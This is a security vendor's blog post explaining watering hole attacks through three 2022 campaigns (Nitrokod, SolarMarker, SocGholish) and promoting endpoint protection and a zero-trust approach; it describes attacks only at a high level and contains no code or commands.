WatchGuard Blog

Watering hole attacks vs. advanced endpoint protection

Share on LinkedIn Share on X Share on Reddit

In a watering hole attack, threat actors usually have to follow a series of steps. First, they need to research the target and make sure they know the type of website the potential victim frequents. Then, they attempt to infect it with malicious code so that when the victim visits it, the website exploits a vulnerability in the browser or convinces them to download a file that compromises the user device.  

Watering hole attack: What is it?

This type of attack is designed to target employees in a specific industry or user group and uses the websites they visit regularly to lure them into a trap that provides access to a company's corporate network. Data theft, economic loss, and reputational damage are often the main consequences of watering hole attacks.  

While these threats resemble supply chain attacks closely, they are not exactly the same. In both cases hackers compromise a third-party service to infect other systems. However, supply chain attacks typically compromise a product that has been purchased, or a service that is used by the target, whereas a watering hole attack infects neutral websites. In contrast, a supply chain attack distributes malware through the "weakest" link of an organization's network, such as a supplier, vendor or partner. 

Three recent examples of watering hole attacks:

1. Nitrokod and fake Google Translate for desktop

In late July 2022, a cryptocurrency mining malware campaign was detected that infected devices in 11 countries. The threat actor was a software developer called Nitrokod that offers free versions of popular software applications that do not have an official desktop version. Its impersonation of the translation utility, created using the official Google Translate web pages and a Chromium-based framework, was its most popular offering and was available on freeware websites, as well as ranking high in search results for "Google Translate desktop download". Unfortunately, the applications were trojanized and, once the software was installed on the device, the infection process was dormant for several weeks to ensure it remained unnoticed. After the dormant interval, the malware kicked in and victims would receive an updated file which would load a series of four droppers on the device over the course of a few days. The last dropper would deploy the Monero-centric XMRig cryptominer and execute it. While this was happening, Google Translate continued to function properly and security analyses raised no red flags. This tactic has allowed the campaign to operate successfully under the radar for years.

2. SolarMarker malware 

In September 2022, the SolarMarker group compromised a vulnerable website run by WordPress to entice its victims to download fake Chrome browser updates. This campaign targeted a global tax consulting organization with a presence in the US, Canada, UK and Europe. In this case, the victim was a company employee who was searching for medical equipment from a specific named manufacturer on Google. Once the employee accessed the compromised website, he was prompted to download an update to the Chrome web browser. The employee then downloaded and executed SolarMarker, which was disguised as a fake update. The fake update was based on the browser the victim was using at the time of accessing the infected website. So, if the user had been using another browser, it would have impersonated Firefox or Edge.

3. SocGholish malware on US news websites  

In November 2022, a criminal group compromised a content provider company that is responsible for providing video content and advertising to major US media outlets in order to deploy malware on their websites. During this campaign, 250 national and regional newspaper web portals in the country were targeted. The malware, called SocGholish and first seen in 2018, was injected into a benign JavaScript file that loaded on the media websites and convinced visitors to download a fake browser update. As in the previous case, the malware took the form of the browser used by the user. Once the attackers gained initial access to the networks, this could be used as an avenue to deploy ransomware, which is a tactic we have seen previously.  

Endpoint protection: critical defense against a watering hole attack 

Watering hole attacks have a high success rate, as they compromise legitimate and trusted websites for users, so that even the most informed and careful employees can fall into the trap. This is why an endpoint protection solution that provides continuous monitoring and prevents the execution of unknown processes is needed. However, bearing in mind that when faced with such an attack, applications can pass as legitimate, the technology used to defend against it must protect users against advanced threats, advanced persistent threats (ATP), zero day malware, and ransomware, among other sophisticated threats. Using AI and automation are beneficial in terms of performing prevention, detection, containment, and response actions. In addition, behavioral analysis is ideal for detecting if there are any malicious actors within the network. The sum of these functions helps achieve comprehensive security, capable of fending off a watering hole attack.  

It is critical to adopt a zero-trust approach, ideally with managed services as we find in the Feature Brief - WatchGuard Zero-Trust Application Service that are able to classify 100% of applications as malware or trusted applications, monitoring the activity of all types of applications at the endpoint. A zero-trust approach can prevent sophisticated threat executions, such as supply chain attacks and watering hole attacks, by observing anomalous behavior of seemingly legitimate software and reclassifying applications as soon as they perform activities typically used by threat actors. There is no doubt that cybercriminals are deploying tactics that are increasingly complex and difficult to detect, but with the right protection, adopting an AI and zero-trust approach, it is possible to deal with them and keep corporate networks secure.  

Interested in learning more about how WatchGuard Endpoint Security helps you avoid attacks like this one? Visit our website and find all the information.